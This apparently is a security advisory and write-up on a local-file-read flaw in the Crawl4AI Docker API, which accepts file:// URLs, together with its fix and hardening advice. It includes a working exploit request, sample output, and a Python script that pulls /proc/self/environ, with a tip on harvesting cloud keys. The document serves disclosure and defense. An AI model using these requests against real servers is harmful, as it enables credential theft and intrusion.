Crawl4AI: When Web Scrapers Become File Servers
Jan 17, 2026 · 5 min read
Executive Summary (TL;DR)
The Crawl4AI Docker API accepted any URL scheme, including `file://`. Attackers could use endpoints like `/execute_js` to read sensitive local files (like `/etc/passwd` or environment variables) simply by asking the crawler to 'visit' them. This is a classic Local File Inclusion (LFI) vulnerability fixed in version 0.8.0.
Crawl4AI, a popular tool for making web content LLM-friendly, inadvertently exposed a massive hole in its Docker API. By failing to validate URL schemes, it allowed unauthenticated attackers to use the `file://` protocol to read local files from the server, turning a useful scraper into a highly effective data exfiltration tool.
The Hook: Feeding the LLM Beast
In the golden age of AI, everyone needs data. Clean, parsed, markdown-ready data. Enter Crawl4AI, an open-source tool designed to crawl websites and spit out content perfectly formatted for Large Language Models. It's a fantastic idea: automate a headless browser, navigate to a URL, scrape the text, and feed the bot.
But here's the catch: Crawl4AI offers a Docker API to make this functionality accessible over a network. This API accepts a JSON payload with a url and instructions on what to extract. The developers assumed you'd pass it https://google.com or https://openai.com.
But security researchers are a cynical bunch. We don't see a 'URL' field; we see a 'URI' field. And browsers—including the headless ones powering this tool—are surprisingly versatile. They don't just speak HTTP; they speak the local filesystem's dialect fluently enough to hand over your server's secrets on a silver platter.
The Flaw: The 'file://' Blind Spot
The vulnerability (GHSA-VX9W-5CX4-9796) is a textbook example of Improper Input Validation. The core logic of the API endpoints—specifically /execute_js, /screenshot, /pdf, and /html—takes the user-supplied url parameter and passes it directly to the browser automation engine (likely Playwright under the hood).
Browser engines are designed to be helpful. If you tell Chrome to visit file:///etc/passwd, it renders the password file. If you tell it to visit file:///proc/self/environ, it shows you the environment variables. This behavior is standard for local browsing but catastrophic for a remote web service.
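You can verify this behavior on your own machine with a few lines of Playwright (a local demonstration sketch, not Crawl4AI's actual code):

```python
from playwright.sync_api import sync_playwright

# Local demo: a headless browser will happily "render" a local file.
with sync_playwright() as p:
    browser = p.chromium.launch(headless=True)
    page = browser.new_page()
    page.goto("file:///etc/passwd")    # no HTTP involved at all
    print(page.inner_text("body"))     # dumps the file's contents
    browser.close()
```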
The flaw wasn't a complex buffer overflow or a heap grooming masterclass. It was a logic error: Protocol confusion. The application checked nothing. It didn't ensure the URL started with http:// or https://. It just took the string and said, "Go fetch, boy!" And the browser fetched exactly what it was told, even if that meant reading the /root directory.
The Code: Trusting User Input
While the exact vulnerable code snippet is standard boilerplate for automation, the logic flow looked something like this. Imagine a Python handler for the /execute_js endpoint:
```python
# VULNERABLE LOGIC (Conceptual)
async def execute_js(request):
    data = await request.json()
    target_url = data.get("url")  # No validation!
    js_script = data.get("scripts")

    # The browser just goes where it's told
    page = await browser.new_page()
    await page.goto(target_url)

    # Execute the script (e.g., return body text)
    result = await page.evaluate(js_script)
    return json_response(result)
```

See the problem? The code assumes target_url is a web address. It fails to realize that to a browser, file:/// is just another valid address.
The fix (implemented in v0.8.0) is remarkably simple—a sanity check before the browser is even invoked:
```python
# FIXED LOGIC (Conceptual)
async def execute_js(request):
    data = await request.json()
    target_url = data.get("url")

    # The sanity check
    if not (target_url.startswith("http://") or target_url.startswith("https://")):
        raise HTTPException(status_code=400, detail="Invalid protocol. Only HTTP/HTTPS allowed.")

    # Proceed safely...
```

The Exploit: Reading /etc/passwd
Exploiting this is trivially easy. You don't need authentication. You don't need to win any race conditions. You just need curl.
Here is how an attacker dumps the /etc/passwd file from the host system (or the container context). We target the /execute_js endpoint because it allows us to run JavaScript on the 'page' (which is actually the local file) and return the text content.
```http
POST /execute_js HTTP/1.1
Host: target-ip:8000
Content-Type: application/json

{
  "url": "file:///etc/passwd",
  "scripts": ["document.body.innerText"]
}
```

The response comes back with the file contents perfectly formatted:
```json
{
  "result": [
    "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin..."
  ]
}
```

> [!NOTE]
> Pro Tip: Smart attackers don't just stop at /etc/passwd. They go for file:///proc/self/environ. In containerized environments, this file often contains the AWS_ACCESS_KEY_ID, DB_PASSWORD, and API keys passed as environment variables. That is the real jackpot.
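To underline how low the bar is, the same attack against /proc/self/environ fits in a few lines of Python (a sketch; the host, port, and response shape are assumptions based on the example above, and you should only point this at systems you own):

```python
import requests  # assumes the 'requests' package is installed

# Hypothetical lab target, mirroring the Host header in the raw request above.
TARGET = "http://target-ip:8000"

payload = {
    "url": "file:///proc/self/environ",      # local file, not a website
    "scripts": ["document.body.innerText"],  # return the rendered text
}

resp = requests.post(f"{TARGET}/execute_js", json=payload, timeout=10)
print(resp.status_code)
print(resp.json())  # environment variables of the crawler process, if vulnerable
```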
The Impact: Total Information Disclosure
Why is this an 8.6 High severity? Because the impact is Confidentiality: High.
- Secret Leakage: As mentioned, reading environment variables often leads to full cloud compromise.
- Source Code Theft: An attacker can read the application's own source code (e.g., file:///app/main.py) to find other vulnerabilities.
- Internal Network Mapping: In some configurations, the browser might be able to access internal dashboards (SSRF via http://localhost:8080) or local file shares.
Since this API is designed to be deployed as a Docker container, the "Scope" is technically changed (Scope: C). While you are theoretically trapped in the container, modern container deployments often mount sensitive volumes or inject secrets that make this containment purely academic.
The Mitigation: Lock It Down
The immediate fix is to upgrade to version 0.8.0. This version introduces the necessary protocol validation logic.
However, this vulnerability serves as a broader lesson in secure design for automation tools:
- Input Validation: Never trust a URL parameter. Whitelist protocols (http, https). Block loopback addresses (127.0.0.1, localhost) unless explicitly required. A sketch of this check follows the list.
- Least Privilege: Run the container with a read-only filesystem where possible. Don't mount the host's root directory.
- Network Isolation: Does your web scraper need to talk to the internal network? Probably not. Use network policies to deny egress to private RFC1918 addresses.
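As promised above, here is what a stricter version of the input-validation bullet could look like. This is my own illustration, not the actual 0.8.0 patch; the function name and error handling are assumptions:

```python
from urllib.parse import urlparse
import ipaddress

ALLOWED_SCHEMES = {"http", "https"}
BLOCKED_HOSTNAMES = {"localhost"}

def validate_target_url(raw_url: str) -> None:
    """Reject anything that isn't a plain http(s) URL to a non-loopback host."""
    parsed = urlparse(raw_url)

    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"Blocked scheme: {parsed.scheme!r}")

    host = (parsed.hostname or "").lower()
    if not host or host in BLOCKED_HOSTNAMES:
        raise ValueError("Missing or blocked hostname")

    # If the host is a literal IP, refuse loopback/private ranges too.
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        pass  # plain hostname; DNS-resolution checks are out of scope for this sketch
    else:
        if addr.is_loopback or addr.is_private:
            raise ValueError("Loopback/private IP addresses are not allowed")
```

Even this isn't airtight: a hostname that resolves to a loopback or private address still slips through, which is why the network-isolation point above matters just as much.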
If you can't upgrade immediately, put a WAF or reverse proxy in front of Crawl4AI and block any JSON payload containing file://.
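If you go the proxy route, the filter can be as blunt as rejecting any request body that references the file:// scheme before it ever reaches Crawl4AI. A naive, bypassable stopgap sketch (the function name and handler wiring are assumptions, and this is no substitute for upgrading):

```python
# Stopgap filter for a reverse proxy or middleware layer (illustrative only).
def body_mentions_file_scheme(body: bytes) -> bool:
    """Crude, bypassable substring check for file:// in a request body."""
    return b"file://" in body.lower()


# Hypothetical use inside a proxy handler:
#   if body_mentions_file_scheme(raw_body):
#       return a 400 response instead of forwarding the request
```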
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| crawl4ai (unclecode) | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| Attack Vector | Network (API) |
| CVSS | 8.6 (High) |
| CWE | CWE-22 (Path Traversal) |
| Privileges | None (Unauthenticated) |
| Impact | High Confidentiality (File Read) |
| Exploit Status | Functional PoC Available |
CWE-22 (Path Traversal) Definition
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.